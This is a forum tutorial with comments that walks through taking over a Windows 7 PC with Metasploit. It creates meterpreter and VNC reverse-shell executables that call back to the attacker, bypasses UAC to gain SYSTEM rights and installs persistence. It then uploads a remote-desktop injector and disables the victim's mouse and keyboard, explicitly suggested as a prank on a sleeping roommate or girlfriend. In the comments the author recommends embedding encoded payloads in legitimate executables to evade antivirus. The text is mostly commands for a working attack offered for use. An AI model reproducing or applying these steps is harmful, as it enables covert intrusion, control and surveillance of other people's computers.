OTW's great Tutorial Hack Like a Pro: How to Save the World from Nuclear Annihilation gives me the inspiration to try this on Win7 sp1.
I did this under Bugtraq 2 Black Widow but it works almost similar on Kali-Linux.
Step 1: Start All Services Und Run Metasploit
On bugtraq not preinstalled so:
# sudo apt-get install vncviewer
Than start the required services:
# sudo service postgresql start
# sudo service metasploit start
# sudo msfconsole
Step 2: We Need Two Payloads
I did this with msfpayload:
First we need the meterpreter
msf > msfpayload windows/meterpreter/reversetcp LHOST=<your-ip> LPORT=<listening-port> x > /home/bugtraq/Desktop/backdoor.exe
Now we got the file backdoor.exe on our Desktop now we need another .exe file that we will upload to our target and execute with the meterpreter.
msf > msfpayload windows/vncinject/reversetcp LHOST=<your-ip>
LPORT=<lisening-port> x > /home/bugtraq/Desktop/gui.exe
Step 3: Lets Run the Meterpreter and Bypass the UAC
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit
So we see that the meterpreter is running on our target but we need more system rights.
meterpreter > getprivs
meterpreter > getsystem
Access Denied!!
Should not be a big problem
You can look you Privs with the command
meterpreter > run post/windows/gather/winprivs
meterpreter > background
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set payload windows/meterpreter/reversetcp
msf exploit(bypassuac) > set LHOST <your-ip>
msf exploit(bypassuac) > set LPORT <port>
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
If that happens only try again
msf exploit (bypassuac) > exploit
works, now:
meterpreter > getsystem
meterpreter > getprivs
Now we should owned the system but we want to have an VNC on the target.
If you want to make the meterpreter persistence should something go wrong just type
meterpreter > run persistence –A –L c:\\ -X 5 –p <port> –r <your-ip>
Step 4: Now the Funny Part
the meterpreter got the download and upload function and the works like this
meterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/
Now we open a second metasploit terminal and type in
msf > use multi/handler
msf exploit(handler) > set payload windows/vncinject/reversetcp
msf exploit(handler) > set LHOST <your-ip>
msf exploit(handler) > set LPORT <port>
msf exploit(handler) > exploit
It should now look like this
Step 5: Getting Finished...
Now we go back to our meterpreter terminal, make sure you are in the folder C:/ where the gui.exe file is and type in
meterpreter > execute -f gui.exe
Step 6: MUCH More FUN
Lets say in front of our target pc sleeps a person(roomate/girlfriend/whatever), if you want to wake him/her in an anoying way search his musik and have some Fun hehe,
meterpreter > uictl disable mouse
meterpreter > uictl disable keyboard
and have fun :D
I am sure there are better ways to do this hack
but it works, suggestions for improvement are always welcome!
Hope you enjoyed
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
8 Comments
Cool !!!!
Thanks :)
What if there is some kind of antivirus installed on the target pc?
these are raw payloads (script kiddi like) for testing purpose only!
If you really want to do that in an realistic way you can turn on your AV and encode and embed the payloads in legitime exfiles to avoid detection. So better use MSFVENOM instead of MSFPAYLOAD because msfpayload seems inacurat and getting deletet from the Metasploit database in June or something.
Our teacher OTW got some nice tutorials to avoid AV detection but if you want i can do another Tutorial in an realistic way so with encoded payloads and turned on AV.
hi i have a question, I've seen many different ways where the attacker can gain access to the victims PC by running vnc on kali linux, but personally when i run vnc i can monitor victims screen but i couldn't control/take over his control of his PC. why is it so? is it because i didn't install something extra for it to work?
Good job. Just to note, when downloading/uploading using meterpreter, one has to use double slashes when specifying the directory. i.e download C:\\topsecret\\secret.txt //usr//share. And one question, after executing the bypass for uac, which session did you continue using? session 2 or 1? thanks
Thx for the note, in my case it works also without double slashes.
After executing the bypass for uac, metasploit opens a second session for that. So i continue working in session 2, session 1 can be closed.
Sorry for answering so late.
but we can use run vnc command simply in meterpreter session.why we need another .exe file to execute..?
Share Your Thoughts